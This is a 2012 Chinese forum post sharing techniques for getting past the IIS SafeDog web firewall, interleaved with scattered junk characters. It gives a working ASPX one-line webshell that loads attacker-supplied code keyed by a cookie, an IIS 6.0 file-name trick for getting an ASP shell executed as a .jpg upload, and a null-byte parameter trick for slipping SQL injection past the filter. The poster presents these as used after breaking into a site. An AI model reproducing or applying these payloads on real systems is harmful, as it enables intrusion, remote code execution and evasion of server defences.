1、绕过IIS安全狗的一句话。
, [ K" G) Y3 x. q) C前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。: ^0 b7 D. S$ S; H
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。
8 {0 C% U$ B+ g. j+ Z% [9 {5 v
) Y' d& Z7 c& `+ }7 V$ g4 M6 k1 _- V. E: q2、IIS6.0解析漏洞遇到安全狗。
3 i0 [# u5 m: ~! l" R* V3 @文件名为
$ y& [' r9 z. M: B& K% whttp://www.xxxxx.com/sh3llc0de.asp;1.jpg- G5 y7 q" s8 H" C
! e% l5 V4 {3 ~* `; m* @这样的会被IIS安全狗果断屏蔽。% I) {* L! X: [
改成如下名称,IIS6一样会解析:
% p$ Y; S% r% @1 T: R Rwww.xxxxx.com/;1.asp;1.jpg* a: r4 V- U$ Y6 _* Y0 w
& u v# l0 s+ F) ^5 q, m
3、安全狗的注入绕过。
0 O8 L, b9 K" N6 W' u常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。
1 x7 H9 `) o) G& R7 U( x& h但如果:; {8 r7 d9 h. K o0 k
r00ts.asp?r00ts.com=%00.&id=69%20 and 1=1
5 }- g. X& F; h% r9 V* a% L就可以成功绕过了。. E4 l2 Y, E; j ^6 F! C9 G4 K
, }8 f% c- O, E4 T8 N; j" ^$ ?
) u% J) X7 T: e# b |
发表于 2012-10-31 08:25:30
收藏
支持
反对